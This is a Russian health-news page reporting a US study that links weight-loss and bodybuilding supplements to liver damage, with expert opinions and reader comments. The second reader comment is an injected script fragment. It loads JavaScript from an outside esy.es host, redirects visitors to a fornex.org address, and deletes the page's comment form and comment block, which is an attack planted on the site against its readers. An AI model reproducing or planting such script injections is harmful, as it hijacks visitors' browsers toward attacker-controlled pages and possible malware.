Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пищевые добавки напрямую ...  >>  Пищевые добавки напрямую повреждают печень. Особенно страшны добавки для снижения веса!
 
Обратная связь
 

Пищевые добавки напрямую повреждают печень. Особенно страшны добавки для снижения веса!

Размер шрифта
20 июня 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Некоторые пищевые добавки для снижения веса и бодибилдинга обладают существенным побочным эффектом: они вызывают поражение печени.

Лекарственное поражение печени

Поражение печени – основная причина изъятия лекарственных препаратов из продажи. Многие люди используют пищевые добавки, которые отпускаются без рецепта, однако, их побочные эффекты неизвестны. Для получения информации о частоте встречаемости лекарственного поражения печени ученые из Университета Томаса Джефферсона (Thomas Jefferson University) под руководством Виктора Наварро (Victor Navarro) использовали Национальный регистр США. Оказалось, что в период с 2003 г. по 2011 г. в 18% случаев поражение печени было вызвано употреблением лекарственных препаратов или пищевых добавок.

Добавки для похудения и бодибилдинга

Различные пищевые добавки воздействуют на печень по-разному.

– Мы не говорим, что все пищевые добавки для похудения и бодибилдинга вызывают поражение печени. Однако многие из них имеют такую особенность, и люди должны знать об этом, – поясняет профессор. – Пищевые добавки для бодибилдинга, которые употребляли мужчины, приводили к развитию желтухи. При этом желтуха сохранялась не менее одного месяца.

– Кожа у мужчин приобретала желтый оттенок, и они испытывали такой сильный зуд, что даже не могли работать, – рассказывает Наварро. – Более 15 из 29 мужчин, принимавших добавки для бодибилдинга, были госпитализированы.

Пищевые добавки для похудения вызывают более тяжелое поражение печени – воспаление. Двоим из 17 участников исследования потребовалась пересадка печени, в ином случае воспаление печени могло бы привести к летальному исходу.

– Что касается пищевых добавок для бодибилдинга, мы можем с уверенностью сказать: они стали причиной поражения печени в 50% случаев. Данное значение для пищевых добавок для снижения веса составило 41%. Следует отметить, что все эти люди не принимали других препаратов, – говорит Наварро.

Мнение экспертов

– Прежде чем принимать пищевые добавки, необходимо проконсультироваться с врачом. Только врач может определить, какие добавки подходят тому или иному пациенту. Некоторые пациенты, принимающие пищевые добавки, должны регулярно сдавать анализ крови для определения уровня печеночных ферментов, – поясняет профессор Дональд Дженсен (Donald Jensen) из медицинского центра Чикагского университета (University of Chicago Medical Center). – Но врач не должен брать всю ответственность за безопасность препарата на себя, ведь каждый препарат снабжен инструкцией по применению, которая предназначена для пациента.

– Поражение печени у людей, принимающих пищевые добавки, обусловлено использованием неизвестных ингредиентов, – считает представитель Совета по ответственному питанию (Council for Responsible Nutrition) Даффи Маккей (Duffy MacKay). – Большие опасения в составе пищевых добавок для бодибилдинга вызывает наличие стероидов и стероидоподобных веществ, которые увеличивают мышечную массу, но также вызывают и поражение печени.

Результаты исследования представлены на конгрессе по заболеваниям желудочно-кишечного тракта в Сан-Диего.


  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Kris

13 октября 2012 в 14:43

Цитировать   |   Пожаловаться

Да уж, к выбору добавок стоит подходить ответственно. Мы с мужем спортсмены (он бодибилдер, я занимаюсь силовыми тренировками и плаванием). 

2 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Пигмент, который вызывает желтуху, защищает от инфаркта   Что делает гастроэнтеролог, если у него запор   Рак кишечника: меньше знаешь, крепче спишь?   Неалкогольное ожирение печени – молчаливая угроза для жизни. Узнайте о заболевании больше  
03 октября 2013Результаты благотворительного марафона «Всем миром» 13 февраля 2013Пигмент, который вызывает желтуху, защищает от инфаркта
 
17 декабря 2012Новый метод позволит ловить раковые клетки 13 ноября 2012Статины спасут от рака
 

Слайдшоу

1
Болезни, которые превратят вашу кожу в кошмар!
Как улучшить свою печень
Камень с плеч! А как избавиться от камней в почках?

Тесты

Знаете ли вы, как работает ваш желудок?
Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.